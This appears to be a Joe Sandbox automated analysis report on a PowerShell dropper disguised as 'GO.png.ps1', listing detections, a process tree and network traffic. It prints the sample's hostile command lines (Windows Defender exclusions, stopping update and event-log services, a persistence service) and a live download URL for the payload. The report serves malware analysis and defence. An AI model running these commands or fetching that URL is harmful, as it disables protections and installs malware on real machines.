Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GO.png.ps1

Overview

General Information

Sample name:GO.png.ps1
Analysis ID:1577476
MD5:8f5f07bdb2e91ee9c9bb9614592cf7fc
SHA1:5545322f658c9cd1884b799244aef8eeac3c00c4
SHA256:3c818d91af1ad7aaa0e599d76ff395e5b694bd2cf05d65d0b53d2036fea726c8
Tags:bulletproofps1user-abus3reports
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file contains section with special chars
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
    • LB311.exe (PID: 708 cmdline: "C:\Users\user\AppData\Roaming\LB311.exe" MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
      • powershell.exe (PID: 6168 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 4136 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 5448 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1824 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6204 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1464 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3228 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5512 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3456 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5596 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6876 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 4620 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • MpCmdRun.exe (PID: 5344 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
            • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • sc.exe (PID: 5492 cmdline: C:\Windows\system32\sc.exe delete "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1308 cmdline: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5184 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2056 cmdline: C:\Windows\system32\sc.exe start "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Mig.exe (PID: 6620 cmdline: C:\ProgramData\Mig\Mig.exe MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
GO.png.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 5328JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_5328.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Change of critical system settings

        barindex
        Sigma detected: Disable power options
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB311.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB311.exe, ParentProcessId: 708, ParentProcessName: LB311.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5512, ProcessName: powercfg.exe

        System Summary

        barindex
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5328, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, ProcessId: 7156, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", ProcessId: 5328, ProcessName: powershell.exe
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5328, TargetFilename: C:\Users\user\AppData\Roaming\LB311.exe
        Sigma detected: Powershell Defender Exclusion
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5328, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, ProcessId: 7156, ProcessName: powershell.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 4620, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
        Sigma detected: New Service Creation Using Sc.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB311.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB311.exe, ParentProcessId: 708, ParentProcessName: LB311.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", ProcessId: 1308, ProcessName: sc.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1", ProcessId: 5328, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Stop EventLog
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB311.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB311.exe, ParentProcessId: 708, ParentProcessName: LB311.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5184, ProcessName: sc.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://176.113.115.178/M.pngAvira URL Cloud: Label: malware
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\Mig\Mig.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\AppData\Roaming\LB311.exeReversingLabs: Detection: 63%
        Multi AV Scanner detection for submitted file
        Source: GO.png.ps1ReversingLabs: Detection: 18%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\LB311.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\Mig\Mig.exeJoe Sandbox ML: detected
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: LB311.exe, 00000006.00000002.1883280158.00007FF62EC4A000.00000040.00000001.01000000.00000009.sdmp
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: LB311.exe, LB311.exe, 00000006.00000002.1883280158.00007FF62EC4A000.00000040.00000001.01000000.00000009.sdmp, Mig.exe
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99175DCE0 FindFirstFileExW,35_2_000002E99175DCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCEDCE0 FindFirstFileExW,41_2_00000213BDCEDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709DDCE0 FindFirstFileExW,44_2_00000158709DDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16EDCE0 FindFirstFileExW,45_2_0000026DB16EDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F066DCE0 FindFirstFileExW,46_2_000002A3F066DCE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

        Networking

        barindex
        Downloads files with wrong headers with respect to MIME Content-Type
        Source: httpImage file has PE prefix: HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Sun, 06 Oct 2024 18:12:58 GMT Accept-Ranges: bytes ETag: "08ec05f1b18db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 18 Dec 2024 13:07:35 GMT Content-Length: 7679488 Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 53 00 00 10 00 00 00 0c 52 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 66 a3 01 00 00 e0 53 00 00 a4 01 00 00 1c 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 55 00 00 02 00 00 00 c0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 55 00 00 02 00 00 00 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 72 79 75 6a 6d 70 00 70 21 00 00 60 8e 00 00 66 21 00 00 c4 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 79 75 64 67 75 75 00 10 00 00 00 d0 af 00 00 02 00 00 00 2a 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 10 00 00 00 e0 af 00 00 02 00 00 00 2c 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: image/pngLast-Modified: Sun, 06 Oct 2024 18:12:58 GMTAccept-Ranges: bytesETag: "08ec05f1b18db1:0"Server: Microsoft-IIS/10.0Date: Wed, 18 Dec 2024 13:07:35 GMTContent-Length: 7679488Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 53 00 00 10 00 00 00 0c 52 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 66 a3 01 00 00 e0 53 00 00 a4 01 00 00 1c 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 55 00 00 02 00 00 00 c0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 55 00 00 02 00 00 00 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 